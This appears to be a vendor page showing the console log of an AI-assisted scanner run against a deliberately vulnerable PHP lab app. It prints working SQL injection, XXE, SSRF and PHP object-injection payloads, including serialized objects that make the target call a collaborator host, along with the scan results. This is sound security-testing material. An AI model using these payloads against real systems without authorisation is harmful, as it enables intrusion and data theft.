The complete, unedited console of one real scan. The AI reads two source files, finds four blind sinks — zero visible response — builds out-of-band payloads, and the built-in collaborator captures the callbacks: a blind PHP object-injection → RCE and a blind SSRF, both proven with hard evidence. (Local host paths masked; callback tokens are per-scan and random.)
| | _| | _\___ \| _|| | GGSec Cortex · v0.9 Beta AI-Guided DAST · Context-Aware SAST GG Advanced IT Security — ggsec.de [*] Loaded config: empty.config.json [*] Scan started : 2026-07-08 17:09:49 [*] Target dir : oob_demo_src ┌─────────────────────────────────────────────────────┐ │ Phase 1 - SAST (Static Analysis via Claude AI) │ └─────────────────────────────────────────────────────┘ [*] Multi-file scan: 2 source file(s) [ext: .ctp .engine .inc .install .module .phar .php .php3 .php4 .php5 .php7 .php8 .phps .pht .phtml .profile .theme .tpl] [i] Dependency/VCS dirs skipped (vendor, node_modules, bower_components, .git, .svn, .hg); use --include-vendor to scan them. → oob_test.php → poi_oob_test.php [*] Found 2 source file(s) in oob_demo_src [*] Dependency-aware batching: 1 batch(es), budget ~120000 input tok/batch (chars/4). [*] Batch 1/1: 2 file(s) — sending to Claude… → batch 1: 4 target(s), tokens in=517 out=1838 [*] Total tokens across 1 batch(es): input=517 output=1838 [*] Regex safety-net: +1 sink(s) the AI SAST did not flag (marked Potential — verify). ==================================================================================================== GGSEC CORTEX - SCAN PLAN File: oob_demo_src ==================================================================================================== SUMMARY: Three files expose multiple vulnerability classes: blind SQL injection, blind XXE, blind SSRF (all in oob_test.php), and PHP Object Injection with an OOB gadget (poi_oob_test.php). All blind sinks require OOB or time-based detection since no output is reflected. GENERAL NOTES: - oob_test.php contains three fully blind sinks (SQLi, XXE, SSRF) with no in-band signal — OOB or time-based detection required. - poi_oob_test.php deserializes a cookie value without validation; the Fetcher gadget class performs an outbound HTTP request in __destruct(), making OOB the only viable detection vector. - All sinks accept direct user input with zero sanitization. TARGETS FOUND: 5 ---------------------------------------------------------------------------------------------------- [1] [HIGH] (Probable) id Location : oob_test.php Sink type : SQL_QUERY Impact : AUTH_BYPASS CWE : CWE-89 (SQL Injection) SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication. CVSS v3.1 : 8.9 (High) [Base 9.8 Critical] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RC:R SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated Compliance : A03:2021 – Injection · PCI-DSS v4.0 Req 6.2.4 (injection/XSS) ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing) MITRE ATT&CK: T1190 Exploit Public-Facing Application Attack chain: Attacker supplies a crafted 'id' parameter → value is concatenated into SQL → blind execution via mysqli_query(). Time-based payloads confirm the injection. Flow : $_GET['id'] is interpolated directly into a SQL query string "SELECT * FROM users WHERE id = $id" and executed via mysqli_query(). The result is never echoed, making this a fully blind SQLi. Time-based detection (SLEEP) is the appropriate method. TEST CASES: > Category : SQLi Method : GET Endpoint : /oob_test.php Indicator : response_delay Payloads : -> 1 AND SLEEP(5)-- - -> 1 OR SLEEP(5)-- - -> 1) AND SLEEP(5)-- - -> 1 AND BENCHMARK(10000000,SHA1('a'))-- - -> 1 UNION SELECT SLEEP(5)-- - > Category : SQLi Method : GET Endpoint : /oob_test.php Indicator : Warning: mysqli|SQL syntax|SQLSTATE Payloads : -> 1' -> 1 OR 1=1-- - -> 1 UNION SELECT 1,2,3,4-- - -> 0 UNION SELECT username,password,3,4 FROM users-- - ---------------------------------------------------------------------------------------------------- [2] [MEDIUM] (Probable) xml Location : oob_test.php Sink type : XXE Impact : FILE_READ CWE : CWE-611 (XML External Entity Reference) An XML parser resolves external entities, enabling local-file disclosure, SSRF, or denial of service. CVSS v3.1 : 6.8 (Medium) [Base 7.5 High] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RC:R SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated Compliance : A05:2021 – Security Misconfiguration · PCI-DSS v4.0 Req 2.2.1 / 6.2.4 ISO/IEC 27001:2022 A.8.9 / A.8.28 · GDPR Art. 32 (security of processing) MITRE ATT&CK: T1083 File and Directory Discovery · T1005 Data from Local System Attack chain: Attacker POSTs a malicious XML document with an external parameter entity → simplexml_load_string() parses it → DTD processing triggers an outbound HTTP request to the OOB collaborator. Flow : $_POST['xml'] is passed directly to simplexml_load_string() with default flags. The parsed result is never echoed — fully blind XXE. An external parameter entity referencing an OOB callback is the only viable detection method. The fetch occurs during DTD parsing, no body reference needed. TEST CASES: > Category : XXE Method : POST Endpoint : /oob_test.php Indicator : oob_callback Payloads : -> <?xml version="1.0"?><!DOCTYPE r [<!ENTITY % x SYSTEM "{OOB_HTTP}"> %x;]><r/> -> <?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "{OOB_HTTP}">]><r>&x;</r> ---------------------------------------------------------------------------------------------------- [3] [HIGH] (Probable) url Location : oob_test.php Sink type : SSRF Impact : INFORMATION_DISCLOSURE CWE : CWE-918 (Server-Side Request Forgery) The server fetches a user-supplied URL, letting an attacker reach internal services or cloud metadata. CVSS v3.1 : 7.8 (High) [Base 8.6 High] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/E:P/RC:R SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated Compliance : A10:2021 – Server-Side Request Forgery (SSRF) · PCI-DSS v4.0 Req 6.2.4 ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing) MITRE ATT&CK: T1090 Proxy · T1552.005 Unsecured Credentials: Cloud Instance Metadata API Attack chain: Attacker supplies a URL in the 'url' parameter → file_get_contents() fetches it server-side → the server makes an outbound request to the attacker-controlled OOB collaborator. Flow : $_GET['url'] is passed directly to file_get_contents() with no validation. The fetched data is stored in $data but never echoed — fully blind SSRF. OOB callback is the only detection method. TEST CASES: > Category : SSRF Method : GET Endpoint : /oob_test.php Indicator : oob_callback Payloads : -> {OOB_HTTP} -> http://{OOB_DNS}/ssrf-test ---------------------------------------------------------------------------------------------------- [4] [HIGH] (Probable) prefs Location : poi_oob_test.php Sink type : PHP_OBJECT_INJECTION Impact : RCE CWE : CWE-502 (Deserialization of Untrusted Data) Untrusted serialized data is deserialized, invoking gadget chains that can lead to remote code execution. CVSS v3.1 : 8.9 (High) [Base 9.8 Critical] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RC:R SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated Compliance : A08:2021 – Software and Data Integrity Failures · PCI-DSS v4.0 Req 6.2.4 / 6.4.3 ISO/IEC 27001:2022 A.8.28 / A.8.29 · GDPR Art. 32 (security of processing) MITRE ATT&CK: T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter Attack chain: Attacker sets Cookie: prefs=<serialized Fetcher with url={OOB_HTTP}> → unserialize() instantiates Fetcher → script ends → GC triggers __destruct() → file_get_contents({OOB_HTTP}) fires outbound request to attacker-controlled server. Flow : $_COOKIE['prefs'] is passed directly to unserialize(). The Fetcher gadget class is in scope: its __destruct() calls file_get_contents($this->url) on an attacker-controlled URL property. The return value of file_get_contents is discarded (@-suppressed, not echoed), so there is zero in-band signal. Detection requires an OOB collaborator callback. The serialized Fetcher payload sets $url to the OOB callback URL; when the unserialized object is garbage-collected, __destruct fires the outbound request. TEST CASES: > Category : PHP Object Injection Method : GET Endpoint : /poi_oob_test.php Indicator : oob_callback Payloads : -> O:7:"Fetcher":1:{s:3:"url";s:7:"{OOB_HTTP}";} -> O:7:"Fetcher":1:{s:3:"url";s:7:"{OOB_DNS}";} ---------------------------------------------------------------------------------------------------- [5] [MEDIUM] (Potential) url Location : oob_test.php:21 Sink type : PATH_TRAVERSAL Impact : FILE_READ CWE : CWE-22 (Path Traversal / Arbitrary File Read) User-controlled path components escape the intended directory, exposing arbitrary files (/etc/passwd, config, source). CVSS v3.1 : 6.3 (Medium) [Base 7.5 High] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RC:U SAST signal : Confidence=Potential · Exploitability=Low · Access=Unauthenticated Compliance : A01:2021 – Broken Access Control · PCI-DSS v4.0 Req 6.2.4 / 7.2.1 ISO/IEC 27001:2022 A.8.3 / A.5.15 · GDPR Art. 5(1)(f) + Art. 32 (confidentiality) MITRE ATT&CK: T1083 File and Directory Discovery · T1005 Data from Local System Flow : [Regex safety-net — the AI SAST did NOT flag this sink; added as a backstop against false-negatives. Low confidence, verify manually.] Regex-SAST (no LLM): tainted ${_REQUEST}['url'] reaches a PATH_TRAVERSAL sink at oob_test.php:21 without an escape/parameterisation guard on the line. Heuristic — verify. TEST CASES: > Category : PATH_TRAVERSAL Method : GET Endpoint : /oob_test.php?url=PAYLOAD Indicator : root:|daemon: Payloads : ==================================================================================================== FINDINGS (Certainty × Severity — Effective CVSS): Critical High Medium Low Confirmed (DAST) 0 0 0 0 Probable (SAST) 0 3 1 0 Potential 0 0 1 0 (Effective = certainty/access-adjusted; per-finding shows Base worst-case. 15 test payload(s).) SECURITY RATING: Rating: C | Severity: HIGH (3 High) | Compromise Probability: Moderate (~40-60%) Max CVSS: 8.9 (High) | Critical: 0 High: 3 Medium: 2 Low: 0 IMPACT SUMMARY: RCE: 1 FILE_READ: 2 AUTH_BYPASS: 1 INFORMATION_DISCLOSURE: 1 ==================================================================================================== [IR warn] SAST plan: target[4] (PATH_TRAVERSAL/url).tc[0]: no Payloads — PayloadEngine will fill from YAML if a pack exists for PATH_TRAVERSAL. [IR ok] SAST plan: schema 1.0, 5 target(s), 1 warning(s) [+] Saved to: oob_demo_src.scanplan.txt [*] SAST completed in 32,9s (plan cached: oob_demo_src.scanplan.json) [*] Preset: full (crawl=on, dom=on, oob=on) ┌──────────────────────────────────────────────────────┐ │ Phase 2 - DAST (Dynamic Probing via HttpProbe) │ │ Target : http://172.26.203.184 │ │ Concurrency: 4 Retries: 2 XSS delay: 800ms │ └──────────────────────────────────────────────────────┘ [*] PayloadEngine: loaded 13 pack(s) from …\bin\Debug\net8.0\payloads (9 sink type(s)) [*] PayloadEngine: CSRF(4 payloads), JSONP(6 payloads), OPEN_REDIRECT(14 payloads), (0 payloads), CODE_EXEC(50 payloads), SQL_QUERY(44 payloads), SSRF(25 payloads), TYPE_JUGGLE(15 payloads), XSS(39 payloads) [OOB] Collaborator up — HTTP:8888 DNS:15353 zone=*.oob.local.test publicHost=172.26.192.1 [*] GGSec Cortex DAST engine v0.9: 16 requests across 5 targets [*] v11.1 Form Crawl: discovering endpoints... [*] Security Headers Audit: [MISS] CSP: MISSING [MISS] X-Frame-Options: MISSING [MISS] X-Content-Type-Options: MISSING [MISS] HSTS: MISSING [MISS] Referrer-Policy: MISSING [MISS] Permissions-Policy: MISSING [INFO] Server header exposes: Apache/2.4.58 [*] Form Crawl: no additional endpoints found [*] Auto-discovering 0 endpoint variations... [*] Phase 1: auth/session harvesting [+] Admin session ready (1 cookie(s)) [+] Admin session refreshed [*] Phase 2: remaining targets [VULN-LIKELY] GET oob_test.php?id=1%27 [VULN-LIKELY] GET oob_test.php?id=1%20UNION%20SELECT%201%2C2%2C3%2C4--%20- Payload: 1' Detection: http-500-likely-sql-error [VULN-LIKELY] GET oob_test.php?id=1%20OR%201%3D1--%20- Payload: 1 UNION SELECT 1,2,3,4-- - Detection: http-500-likely-sql-error Payload: 1 OR 1=1-- - Detection: http-500-likely-sql-error [VULN-LIKELY] GET oob_test.php?id=admin%27%20OR%20SLEEP%285%29-- Payload: admin' OR SLEEP(5)-- Detection: http-500-likely-sql-error (time-payload) [VULN-LIKELY] GET oob_test.php?id=0%20UNION%20SELECT%20username%2Cpassword%2C3%2C4%20FROM%20users--%20- Payload: 0 UNION SELECT username,password,3,4 FROM users-- - Detection: http-500-likely-sql-error [VULN] GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2F172.26.192.1%3A8888%2F519205e607c1 Payload: http://172.26.192.1:8888/519205e607c1 Detection: oob-callback-http [ok ] GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2Fd05febbb035b.oob.local.test%2Fssrf-test :: 200, 8244ms [ok ] POST http://172.26.203.184/oob_test.php :: 200, 8210ms [ok ] POST http://172.26.203.184/oob_test.php :: 200, 8214ms [*] 5 serialized payload(s) for oob_test.php (time-based / 2nd-order) — running one at a time [VULN-LIKELY] GET oob_test.php?id=1%20AND%20SLEEP%285%29--%20- Payload: 1 AND SLEEP(5)-- - Detection: http-500-likely-sql-error (time-payload) [VULN-LIKELY] GET oob_test.php?id=1%20OR%20SLEEP%285%29--%20- Payload: 1 OR SLEEP(5)-- - Detection: http-500-likely-sql-error (time-payload) [VULN-LIKELY] GET oob_test.php?id=1%29%20AND%20SLEEP%285%29--%20- Payload: 1) AND SLEEP(5)-- - Detection: http-500-likely-sql-error (time-payload) [VULN-LIKELY] GET oob_test.php?id=1%20AND%20BENCHMARK%2810000000%2CSHA1%28%27a%27%29%29--%20- Payload: 1 AND BENCHMARK(10000000,SHA1('a'))-- - Detection: http-500-likely-sql-error (time-payload) [VULN-LIKELY] GET oob_test.php?id=1%20UNION%20SELECT%20SLEEP%285%29--%20- Payload: 1 UNION SELECT SLEEP(5)-- - Detection: http-500-likely-sql-error (time-payload) [VULN] GET (cookie) http://172.26.203.184/poi_oob_test.php Payload: O:7:"Fetcher":1:{s:3:"url";s:37:"http://172.26.192.1:8888/6d57d558a5b4";} Detection: oob-callback-http [ok ] GET (cookie) http://172.26.203.184/poi_oob_test.php :: 200, 8240ms [*] Active header checks: CORS · Host-header · Cache-Control [ok ] CORS: no arbitrary-origin reflection [ok ] Host-header: attacker host not reflected [ok ] Cache-Control: no cacheable session response observed [warn] Version-indicated CVE (unverified): apache 2.4.58 → CVE-2024-38475 (Critical) [warn] Version-indicated CVE (unverified): apache 2.4.58 → CVE-2024-38476 (High) [*] PII / data-exposure scan: none found [*] Deep crawl (--crawl): spidering for param-bearing endpoints... [*] Deep crawl: 6 param-bearing URL(s) discovered → fuzzing [*] Scan complete: 18 requests, 5 finding(s) [2 confirmed, 3 likely] from 14 confirming request(s) [CONFIRMED] PHP_OBJECT_INJECTION prefs CVSS 9.8 CWE-502 (confirmed by 1 payload(s)) Certainty: Confirmed (dynamic probe) · Evidence strength: Medium (83/100) GET (cookie) http://172.26.203.184/poi_oob_test.php Access: 🔓 Unauthenticated e.g. payload: O:7:"Fetcher":1:{s:3:"url";s:37:"http://172.26.192.1:8888/6d57d558a5b4";} PoC: OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/6d57d558a5b4, provi… ATT&CK: T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter Fix: Do not unserialize untrusted data; use a safe format and restrict allowed classes. [LIKELY] OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38475 CVSS 8.9 [Base 9.8] CWE-1104 (confirmed by 1 payload(s)) Certainty: Likely (dynamic probe) · Evidence strength: Low (43/100) GET Access: 🔓 Unauthenticated e.g. payload: outdated-component PoC: Server banner 'Apache/2.4.58' matches CVE-2024-38475 (CWE-22, Critical): mod_rewrite improper output escaping → URL mapped to filesystem (RC… ATT&CK: T1190 Exploit Public-Facing Application Fix: Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build. [LIKELY] SQL_QUERY id CVSS 8.9 [Base 9.8] CWE-89 (confirmed by 10 payload(s)) Certainty: Likely (dynamic probe) · Evidence strength: Tentative (30/100) GET oob_test.php?id=1%20UNION%20SELECT%201%2C2%2C3%2C4--%20- Access: 🔓 Unauthenticated e.g. payload: 1 UNION SELECT 1,2,3,4-- - PoC: (no response body captured) ATT&CK: T1190 Exploit Public-Facing Application Fix: Use parameterized queries / prepared statements — never build queries by string concatenation. [CONFIRMED] SSRF url CVSS 7.7 [Base 8.6] CWE-918 (confirmed by 1 payload(s)) Certainty: Confirmed (dynamic probe) · Evidence strength: Medium (83/100) GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2F172.26.192.1%3A8888%2F519205e607c1 Access: 👤 Customer e.g. payload: http://172.26.192.1:8888/519205e607c1 PoC: OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/519205e607c1, provi… ATT&CK: T1090 Proxy · T1552.005 Unsecured Credentials: Cloud Instance Metadata API Fix: Allowlist outbound destinations and block internal address ranges; don't fetch user URLs directly. [LIKELY] OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38476 CVSS 6.8 [Base 7.5] CWE-1104 (confirmed by 1 payload(s)) Certainty: Likely (dynamic probe) · Evidence strength: Low (43/100) GET Access: 🔓 Unauthenticated e.g. payload: outdated-component PoC: Server banner 'Apache/2.4.58' matches CVE-2024-38476 (CWE-476, High): mod_proxy null-pointer dereference → DoS via malicious backend respons… ATT&CK: T1190 Exploit Public-Facing Application Fix: Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build. [*] DAST completed in 16,8s [*] Raw HTTP log: oob_demo_src.20260708-170949.rawlog.txt [*] Dependency scan (oob_demo_src): no known-vulnerable versions matched [+] HTML report saved — open: cortex-oob-demo.report.html [+] PDF report saved — open: cortex-oob-demo.report.pdf ╔══════════════════════════════════════════════════════╗ ║ SCAN TIMING SUMMARY ║ ║──────────────────────────────────────────────────────║ ║ Started : 2026-07-08 17:09:49 ║ ║ Finished : 2026-07-08 17:10:39 ║ ║ Duration : 50,4s ║ ╚══════════════════════════════════════════════════════╝
Real, unedited output against a deliberately-vulnerable test application (PHP 8.3 / Apache 2.4). For authorised security testing only. · Open the full report → · GG Advanced IT Security — ggsec.de